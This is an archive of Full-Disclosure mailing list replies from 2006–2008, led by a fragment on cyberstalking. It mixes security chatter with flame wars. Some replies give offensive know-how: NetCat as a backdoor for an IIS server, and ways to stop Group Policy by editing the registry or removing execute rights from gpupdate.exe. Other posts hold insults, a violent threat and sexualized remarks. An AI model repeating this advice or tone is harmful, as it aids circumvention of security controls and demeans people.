send electronic viruses and unsolicited e-mails. [7] Victims of cyberstalkers may not even know that they are being stalked. Cyberstalkers may research individuals to feed their obsessions and curiosity. Conversely, the acts of cyberstalkers may become more intense, such as repeatedly instant messaging their targets. [8] More commonly they will post defamatory or derogatory statements about their stalking target on web pages, message boards and in guest books designed to get a reaction or response from their victim, thereby initiating contact. [7] In some cases, they have been known to create fake blogs in the name of the victim containing defamatory or pornographic content. When prosecuted, many stalkers have unsuccessfully attempted to justify their behavior based on their use of public forums, as opposed to direct contact. Once they get a reaction from the victim, they will typically attempt to track or follow the victim's internet activity. Classic cyberstalking behavior includes the tracing of the victim's IP address
Re: [Full-disclosure] RE :OT - Don't fuck with n3td3v
HUH?? WTF are you talking about? My comment was about you questioning HD about the Weather. - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, May 07, 2008 2:33 PM Subject: Re: [Full-disclosure] RE :OT - Don't fuck with n3td3v On Wed, May 7, 2008 at 7:23 PM, Exibar [EMAIL PROTECTED] wrote: n3tdunc3 said: ...mentioned a project HD Moore is working on called Metasploit and questioned weather... I honestly don't think that HD has anything to do with the weather, I wouldn't bother him about that. Although, HD does have God like status, so perhaps he CAN control the weather Hm ;-) Exibar There is no justification for Cyberstalking, yet you try and use someone making constructive criticism of Metasploit as being that justification. All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] defining 0day
Exactly. Zero Day Exploit: A brand new exploit. For a brand new vulnerability that isn't known either public or private (private = vendor only). The Exploit itself is also brand new, never before known either public or private. Exibar - Original Message - From: Douglas K. Fischer [EMAIL PROTECTED] To: n3td3v [EMAIL PROTECTED] Cc: n3td3v [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; Gadi Evron [EMAIL PROTECTED] Sent: Friday, May 02, 2008 3:10 PM Subject: Re: [Full-disclosure] defining 0day Original Message Subject: Re: [Full-disclosure] defining 0day From: n3td3v [EMAIL PROTECTED] To: Gadi Evron [EMAIL PROTECTED], full-disclosure@lists.grok.org.uk, n3td3v [EMAIL PROTECTED] Date: 04/19/2008 18:44 On Tue, Sep 25, 2007 at 8:02 PM, Gadi Evron [EMAIL PROTECTED] wrote: Okay. I think we exhausted the different views, and maybe we are now able to come to a conlusion on what we WANT 0day to mean. What do you, as professional, believe 0day should mean, regardless of previous definitions? Obviously, the term has become charged in the past couple of years with the targeted office vulnerabilities attacks, WMF, ANI, etc. We require a term to address these, just as much as we do unpatched vulnerability or fully disclosed vulnerability. What other such descriptions should we consider before proceeding? non-disclosure? Gadi. I just caught a news article that summed up nicely what 0day means... A zero-day flaw is a software vulnerability that has become public knowledge but for which no patch is available. It is particularly dangerous since users are exposed from day zero until the day a vendor prepares a patch and notifies users it is ready. http://www.pcworld.com/businesscenter/article/144803/chinese_blogs_detail_zeroday_flaw_in_microsoft_works.html Regards, n3td3v I would actually add one more criteria. Not only would a 0day have no patch available, but the vulnerability being exploited would not have been previously announced. In other words, the very first exposure in the wild of a 0day would be active exploitation of an as of yet unknown (except of course by the exploit author) vulnerability. This makes a true 0day all the more potent. Cheers, Doug ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] in Memory of Dude VanWinkle / Justin Plazzo
It truly is a sad day today that JP died. I know some people didn't like his postings, but that doesn't really matter. It's truly sad when one of our own dies unexpectedly like this, truly sad. Does anyone have any news as to how this tragedy happened? He surely will be missed, he always added a little spice to certain topics that will forever be gone. Rest in peace JP, the universe is now yours to explore... Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron Sent: Monday, February 11, 2008 3:43 PM To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] in Memory of Dude VanWinkle / Justin Plazzo I was just woken up with the news of Justin's death and am unsure what to think or how to respond--I need to. I feel things are left unfinished, a light just disappeared without warning, and all I can think of is what I said to him, when and where. Was I nice? Was I respectful? Did I always treat him right? What could I do differently? What will our small corner of the universe look like without him? What's clear is that he was a good guy who strove to always do better and was not afraid of voicing his opinion or making himself heard. He was also quick to apologize when necessary. His opinions never stopped him from seeing the person on the other side. He took subjects he discussed seriously, but never lost sight of the fun. He never stopped learning and he evolved a great deal over the past couple of years in which I had the opportunity to know him. One day, I was hoping to meet him. He was a good guy. He became an integral part of our community and only now I realize how much that is true. He cared. I care. He is missed. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Xbox live accounts are being stolen
charge back the charges on your card with your credit card company. You're not liable for any fraudulent charges on most CC's, some have a $50 deductible. Exibar -Original Message- From: Ashley Wilson [mailto:[EMAIL PROTECTED] Sent: Tuesday, August 07, 2007 5:09 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] Xbox live accounts are being stolen Hey there, I'm so very frustrated with Microsoft and went on a search to see if anyone else has had the same issue and low and behold, I came across you're article of sorts. Its been over a month now, since I was hacked. I woke up on a Sunday morning, check my email as I do everyday. I had 4 emails from Microsoft stating I purchased 2 Microsoft points and a year subscription. As most people would, I panicked and wondered what kind of insane thing happened. When I turned on my Xbox and attempted to log into my account, I couldn't. My boyfriend shortly after that, recovered my account on the Xbox and we came to find out that my username had been changed, all my friends had been deleted off my list and my motto was changed to LOL I got jacked. I was furious to think someone could do such a thing. They not only stole my account but over 400 dollars was spent on my credit card. I called Microsoft support shortly after that. I got the run around. Transferred to one agent and then another. They basically accused me of giving out the information. I eventually got to speak to a supervisor, who assured me that everything would be taken care of. They even said they would catch the individual that did this and assured me a phone call in a few days, as they had to send in a full investigation the next day. 3 weeks later and I was still waiting for a call. I decided it was time for me to call them, since obviously I as a customer wasn't important to them. Again, the run around. I spoke with again, another supervisor who informed me that they hadn't even sent out the investigation yet. He assured me that he would send it out that very day and I should receive a call within 3 days. I sat home waiting to receive a call for 3 days. Again, I never received a phone call. By the 4th day, I called again. Speaking with an agent who assured me, I will receive a call. Its under investigation now, you have to wait for a phone call. Now, 2 weeks later and I called again today. I'm told that they attempted to call me today and I have to wait to speak with them because there is nothing they can do. I paid for a subscription that I am not getting to use and apparently won't be able to use. I'd also like to mention when he said they tried calling today, he said they left a voice mail message. I don't have voice mail, so I got concerned. Then he read my phone number It wasn't even my number and I had never heard the number in my life. Slightly odd, since I gave them my phone number the previous time I had called. Now I'm suppose to receive a call this Thursday. We will see I won't hold my breathe. I am so very frustrated that Microsoft as huge a cooperation as they are, doesn't even have the decency to call me or reimburse me for a 50 dollar Xbox live account. I apologize for this longwinded email and I'm not even sure if you still care about this issue but I was quite overjoyed to see I wasn't alone. Sincerely Ashley Wilson ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Drive-by Pharming
I feel this whole thing simply serves as a reminder to simply change your default passwords on your devices. REgardless of the type of device, CHANGE THE DEFAULT PASSWORD! Exibar -Original Message- From: pagvac [mailto:[EMAIL PROTECTED] Sent: Saturday, February 17, 2007 6:32 PM To: Fabian (Lists) Cc: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Drive-by Pharming I'm sorry, this looks to me like plain CSRF against web interfaces of intranet network devices. If someone knows your router's password (i.e.: default password) and the router's HTTP requests are NOT tokenized (vulnerable to CSRF), then an attacker can most certainly do anything on your behalf by tricking you to visit an evil webpage. Changing DNS settings is just one of the many evil things you could do. Others include changing password to a new one (DoS to legitimate router admin user), exposing the admin web interface to the Internet, disabling security, exposing internal hosts to the Internet through port-forwarding, etc... Of course, if the web interface is designed really badly you might not even need a password to CSRF it. Some of you might recall the CSRF issue on Linksys WRT54g reported by Ginsu Rabbit back in August 2006 which allowed you to turn off the security of the device completely. Ginsu Rabbit's Advisory: http://www.securityfocus.com/archive/1/442452/30/0/threaded PoC for the vuln: http://ikwt.com/projects/linksys/linksys-unauth-csrf.html CSRFing intranet devices research published in the past: http://www.whitehatsec.com/home/resources/presentations/files/java script_malware.pdf Am I missing something guys? On 2/16/07, Fabian (Lists) [EMAIL PROTECTED] wrote: Larry Seltzer wrote: This response doesn't seem to address any Linksys (and therefore Cisco) routers, does it? Seems so... Maybe because they are not IOS based and therefore not real Cisco Routers as we all know them? --Fabian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pagvac [http://ikwt.com/] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] phishing sites examples source code
yah, check your e-mail for phishing messages - Original Message - From: Andres Riancho To: full-disclosure@lists.grok.org.uk Sent: Thursday, February 15, 2007 9:13 PM Subject: [Full-disclosure] phishing sites examples source code Hi, For a research i'm doing I need a somehow big(around 100 would be nice...) amount of phishing sites html code . I have googled for them but I only get a lot of screenshots of those sites, not the actual code. Anyone has an idea of where I could get those sites html ? Cheers, -- Andres Riancho -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Sasser or other nasty worm needed
wow, the fastest way to catch any type of worm like that is to stick an unpatched, no A/V running, windows box out on the internet. You'll have so many bugs you won't know what to do with them all... Exibr -Original Message- From: kikazz [mailto:[EMAIL PROTECTED] Sent: Sunday, November 26, 2006 5:32 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] Sasser or other nasty worm needed I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: MS are doing Windows Updates for XP to IE7
IE^ is still people's web browser, why should MS shove IE7 down our throughts? Automatic update should be flexable enough to give you a no IE upgrade, patches only checkbox... Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Sunday, October 29, 2006 7:26 PM To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] MS are doing Windows Updates for XP to IE7 On Mon, 30 Oct 2006 12:48:13 +1300, Nick FitzGerald said: Well, yes, if you are (a) clued and (b) know it's coming. If you've got it set to download-and-install at 3AM every Wednesday morning, you may be in for a surprise If you're _NOT_ clued enough to know better then you deserve the automatic, silent IE 7 upgrade. MS got this right. I didn't say MS didn't get this right, in fact I agree that this is the way it should work. Doesn't change the fact that several hundred million unclued users are likely to wonder what happened to their IE6. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: [ Capture Skype trafic ]
I'm sorry, but that document outlines HOW Bluecoat can and does block Skype. A packet or protocol anaylizer Proxy will block anything that is NOT conforming HTTP to travel along on port 80. Skype does not conform to HTTP standards (for one it's encrypted) and BlueCoat will stop it. Yup, you can't be a moron and have every other port under the sun open on your network too STEP 4: INSTALL SSL CONTROLS ON THE BLUE COAT SG The Blue Coat SG appliances managing application service ports for HTTP (80), RTSP (554), MMS (1755), etc. will drop client connections if the packets sent do not conform to the appropriate protocol. When Skype uses port 80, the protocol used is still Skypes proprietary protocol and does not conform to HTTP and so will be blocked. The Skype application finally attempts to use port 443, if the SSL controls are installed (part of SGOS v4.2) these packets will also be dropped as there is no SSL certificate exchanged between Skype nodes. Therefore, any attempt to establish a Super-node connection through these service ports will be unsuccessful, as the connection is nonconforming to standards. -Original Message- From: Tyop? [mailto:[EMAIL PROTECTED] Sent: Friday, October 27, 2006 2:19 PM To: Exibar; full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] [ Capture Skype trafic ] On 10/27/06, Exibar [EMAIL PROTECTED] wrote: From: Tyop? [EMAIL PROTECTED] All is in the mail's subject. I need to match this crazy-encrypted-random trafic, to destroy it (I think I'm not alone to need informations on this product). I've found some work on the BlackHats slides, but skype updates.. use a packet analyzer proxy bluecoat comes to mind as one that works quite well... http://www.bluecoat.com/downloads/whitepapers/BCS_controlling_skype_wp.pdf Bluecoat doesn't match the packets, sorry. quote: It is also recommended that enterprises block downloads of URLs ending with skype.exe. This will prevent new Skype software from being downloaded to enterprise machines. This is very funny. ^-^ -- Tyop? Please excuse my english. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ Capture Skype trafic ]
use a packet analyzer proxy bluecoat comes to mind as one that works quite well... Exibar - Original Message - From: Tyop? [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Sent: Friday, October 27, 2006 7:27 AM Subject: [Full-disclosure] [ Capture Skype trafic ] All is in the mail's subject. I need to match this crazy-encrypted-random trafic, to destroy it (I think I'm not alone to need informations on this product). I've found some work on the BlackHats slides, but skype updates.. Thx in advance. -- Tyop? Student. Excuse my english. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] As long as you guys are THIS easy to troll let mesay..
lets not forget: 10, Car salesmen are assholes 11.any saleman is an asshole 12. n3td3v is still an id10t a$$h0l3, even tho he's finally gone away (his mommy grounded him from the internet me-thinks) - Original Message - From: Jeb Osama To: full-disclosure@lists.grok.org.uk Sent: Friday, October 13, 2006 12:27 PM Subject: [Full-disclosure] As long as you guys are THIS easy to troll let mesay.. As long as you guys are THIS easy to troll let me say..1. Americans are assholes.2. Racists are assholes3. French are assholes4. Hitler was an asshole5. Right-wingers are assholes6. The GODWIN guy was an asshole7. The UN is an um.. asshole organisationCome on.. you know you GOT TO reply to one of those..JebPS : Not to forget..8. Arabs are assholesand not to forget 9. computer salesmen.. man, they're assholes too! ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] ****[ NOT SPAM ]****
Are we going to have to add a number 14 to that assholes list? -Original Message-From: scripteaze [mailto:[EMAIL PROTECTED]Sent: Friday, October 13, 2006 1:46 PMTo: full-disclosure@lists.grok.org.ukSubject: [inbox] [Full-disclosure] [ NOT SPAM ] I subscribed to this list because i wanted to be updated with the latest security issues, not to listen to children( trolls or skilled) This is the type of stuff you get when you become a member to some "media whore elite Hax0rs" site which there are a million of those. This list is and should be kept professional. Lets all just move on and drop all the BS, remember where and who you are are and why your here to begn with..-- -=scripteaze=- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Good ASP backdoor?
NetCat is a tried and true favorite - Original Message - From: Lachniet, Mark [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, September 14, 2006 2:44 PM Subject: [Full-disclosure] Good ASP backdoor? Can anyone suggest a good backdoor for placing on a IIS server when you can upload a file to document root? For exapmle an all-in-one tool with upload, download, command execution, etc. There are several basic ones out there - I was wondering if anyone ever wrote a really spiffy one. Thanks in advance, Mark Lachniet ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CENSORED is watching you!!!
SHH!!! we're finally rid of him! Never ever EVER speak his name again -Original Message-From: yearsilent [mailto:[EMAIL PROTECTED]Sent: Saturday, August 19, 2006 5:40 AMTo: vodka hooch; full-disclosure@lists.grok.org.ukSubject: [inbox] Re: [Full-disclosure] n3td3v is watching you!!!back to home, and watch you mother !vodka hooch [EMAIL PROTECTED] wrote: the biggest hackers is watching google and yahoo we watch fd too people think we disappear we still strong we biggest hackers around big bad hackers! you think you can bad mouth n3td3v in threads and talk about mail filters we beat mail filter, we beat everyone governments, businesses and everyone! we got techniques to penetrate windows vista windows vista hacks be made public soon we distribute on public list you think you win, no n3td3v win n3td3v not just one person, we big you think we lamers, no we hav 0day programs and techniques we can engineer the security industry and make things happen to get securityfocus.com and news.com to write stories we not care anymore what people think we do our own thing n3td3v security group are best, we is new movement you not say anything to change what we is we new, we big, we bold we here to stay n3td3v Do you Yahoo!?Get on board. You're invited to try the new Yahoo! Mail Beta.___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ Want to be your own boss? Learn how on Yahoo! Small Business. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v please shutup, please shutup.
Someone take pictures of this n3td3v chick at Con, I wanna see what she looks like.. - Original Message - From: codeslag To: full-disclosure@lists.grok.org.uk Sent: Monday, July 31, 2006 8:31 AM Subject: [Full-disclosure] n3td3v please shutup, please shutup. Right, i've kept quiet and read your bullshit for a good while now so I thought i'd add to the noise on this list and say:IM GONNA COME TO DEFCON AND BEAT THE LIVING SHIT OUT OF YOU.EOF ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]
Sorry didn't mean to offend with the Bikini comments any reasonable way huh? How about sending a picture of yourself holding a small sign that says Full-Disclosure is Awesome! and that very long number that was sent to you previously on the bottom of the sign :-) ok, seriously now, it would be interesting to see how many pieces of spam you're receiving after this whole thing :-) Ex - Original Message - From: [EMAIL PROTECTED] To: Cardoso [EMAIL PROTECTED] Cc: Full Disclosure full-disclosure@lists.grok.org.uk Sent: Monday, July 24, 2006 9:40 PM Subject: Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED] hey guys, language please. i can show you i'm the master of [EMAIL PROTECTED] in any reasonable way. i use this address to collect spam and check most of receives in it. so don't be so sensitive, hackers! -- http://www.lwang.org mailto:[EMAIL PROTECTED] 2006/7/25, Cardoso [EMAIL PROTECTED]: Based on the last australian IT Babes calendar, I advise you to scrap the bikini idea. On Mon, 24 Jul 2006 14:47:45 -0400 [EMAIL PROTECTED] wrote: V On Mon, 24 Jul 2006 14:37:31 EDT, Exibar said: VI think we should have Alice pose in a bikini or less for us and send us V a few pictures. As even that we have zero idea if that's the real Alice, at V least we'll have some pictures of someone that could be names Alice in a V bikini or less :-) V V Might want to make sure Alice isn't a great-grandmother first. :) V year(now) + 1 será o ano do linux! Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299 vida digital: http://www.contraditorium.com site pessoal e blog: http://www.carloscardoso.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Have a Good Day ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]
LOL. I think it's her husband and that they're going through a messy divorce and he want's to trash her e-mail address with as much spam as possible. Exibar - Original Message - From: Brian Eaton [EMAIL PROTECTED] To: Full Disclosure full-disclosure@lists.grok.org.uk Sent: Monday, July 24, 2006 1:24 PM Subject: Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED] On 7/24/06, Paul Schmehl [EMAIL PROTECTED] wrote: Alice Bryson wrote: Yes, i am Alice, to prove that you can send an email with a long number to [EMAIL PROTECTED], and i will reply you that number, ok? What does that prove? It would prove she can read mail sent to [EMAIL PROTECTED] Or that she's psychic. Regards, Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Please help to spam [EMAIL PROTECTED]
snip 2 - Alice takes a picture of herself doing something silly like carving a commodore 64 in wood or wearing a hat made of meat.. I vote for the second one. Worked with 419 scammers. http://www.boingboing.net/2006/06/28/nigerian_letter_scam.html snip I think we should have Alice pose in a bikini or less for us and send us a few pictures. As even that we have zero idea if that's the real Alice, at least we'll have some pictures of someone that could be names Alice in a bikini or less :-) Although wearing a hat of meat is awefully funny :-) Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows Live OneCare Zero-Day
OMG!!! Someone actually wants to sign up for your little list and you're giving them crap and insults just a few messages ago you were bribing people to join your list by offering free zero-day exploit code to anyone that would sign up. make up your mind... stop trolling leave the list and stay on your own. Ex - Original Message - From: n3td3v [EMAIL PROTECTED] To: j w [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Friday, June 02, 2006 1:29 PM Subject: Re: [Full-disclosure] Microsoft Windows Live OneCare Zero-Day On 6/2/06, j w [EMAIL PROTECTED] wrote: how do i sign up for your list? Thanks Hi, If you were an international hacker you wouldn't be asking this, please unsubscribe Regards, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I'm ready to tell the police
nevermind with the police you want ot talk to Dateline, or 20/20. Dateline is really big on the whole evil internet thing right now so they are ripe for this story, if it's true... the media is the way to go if you really want to turn the bad guys in. You might even earn some credibility too Exibar - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Sunday, May 21, 2006 8:45 PM Subject: Re: [Full-disclosure] I'm ready to tell the police On 5/22/06, Michael Silk [EMAIL PROTECTED] wrote: yep, fd definately needs it's own tv show. i'd watch it ... You think this is a joke? n3td3v was never a joke, but everyone on fd treated it like one. We're the biggest group around of rogue employees at major internet companies aka dot-coms... i'm ready to walk upto my local police sation right now just get hand them in, i'm not having a major breakdown... ive known them for 7 years and now im ready to hand myself in and give evidence against these guys at yahoo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] Re: [Full-disclosure] Full Disclosure Code of conduct
well... sure sounds like n3td3v found another e-mail address to use -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Saturday, May 06, 2006 9:13 PM To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: [inbox] Re: [Full-disclosure] Full Disclosure Code of conduct No selling of exploits and vulnerabilities? ahahahahaha... jesus fucking christ on a cross you are truly a dumb cunt. Guess I just fucked your other two rules didn't I. On Sat, 06 May 2006 18:01:20 -0700 Aaron Gray [EMAIL PROTECTED] wrote: I am suggesting that we all cooperate and produce a Code of Conduct for participating on the Full Disclosure mailing list. Suggested start :- 1) No Swearing 2) No slagging others off 3) No selling of exploits and vulnerabilities Regards, Aaron Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [inbox] Re: [Full-disclosure] Full Disclosure Code of conduct
-Original Message- From: n3td3v [mailto:[EMAIL PROTECTED] Sent: Saturday, May 06, 2006 10:21 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Full Disclosure Code of conduct On 5/7/06, Aaron Gray [EMAIL PROTECTED] wrote: I am suggesting that we all cooperate and produce a Code of Conduct for participating on the Full Disclosure mailing list. Suggested start :- 1) No Swearing 2) No slagging others off 3) No selling of exploits and vulnerabilities Lets add: 4) No Cross-site scripting and SQL injection advisories. We get the picture, theres 100 million flaws for guestbooks/bulletinboards and other unheard of vendor products. Its time to kill the cross-site scripting and sql injection spam created by copy paste script kids. Let the lame Securityfocus Bugtraq mailing list get submitted with that B*S from now on. Let add: 5) no posts from N3td3v or 0x80 (even though this last post by n3td3v was actually an acceptable post) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
I have a sure fire way to make your computer, ANY COMPUTER, YES ANY COMPUTER!!! 100% safe from hackers, spyware, viruses, and anything else malicious that you can think of. yes it's true, I am not lieing here. I work in an office by day, making barely enough to afford real tomato ketchup for my family's French Fries. I will sell this procedure to the highest bidder that can prove to me that they will pay for this knowledge. WELCOME TO FullDisclosure-Bay! Your auction site for vulnerabilities, exploits, and fixes!!! ROFL, I mean no disrespect man, just couldn't resist. yah, I'm sure if you think about it a bit you'll realize what my procedure is. dude, there ARE places that will give you cold hard cash for your proven exploits, mind you I did say PROVEN this really isn't the list to advertise selling exploits on though. Exibar - Original Message - From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, May 04, 2006 7:46 PM Subject: [Full-disclosure] IE7 Zero Day Yes, this is a beta product but I have reason to believe that this issue will not be discovered of fixed by M$ before it goes to gold. Why do I believe this? Because the issue is found in IE 6 but doesnt seem to exploit. Not saying it is not exploitable I am saying that I cant make it exploit. I work as a pizza delivery driver at night and work part time landscaping in my days. So I feel it is only fair that I be compensated for this vulnerability. Highest bidder that can convince me that you will actually pay wins. Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] bypassing Windows Domain Group Policy Objects
I seem to recall a paper on the circumventing of Windows Domain GPO's, but I can't find it anywhere. anyone have any information on preventing GPO's from being applied to a Domain machine? or a link to that paper? thanks! Ex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] bypassing Windows Domain Group Policy Objects
- Original Message - From: Michael Holstein [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, April 27, 2006 10:37 AM Subject: Re: [Full-disclosure] bypassing Windows Domain Group Policy Objects System Key: [HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System] Value Name: DisableGPO Data Type: REG_DWORD (DWORD Value) Value Data: (0 = default, 1 = disable group policy) strike that .. production releases ignore this. Other possible solution, cripple gpupdate.exe (XP) or secedit.exe (2K) through permissions (eg: remove 'localsystem:execute'). Deleting them will just trigger WFP to replace. /mike. H. sounds like a good plan :-) I'll test that out! thanks! Ex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
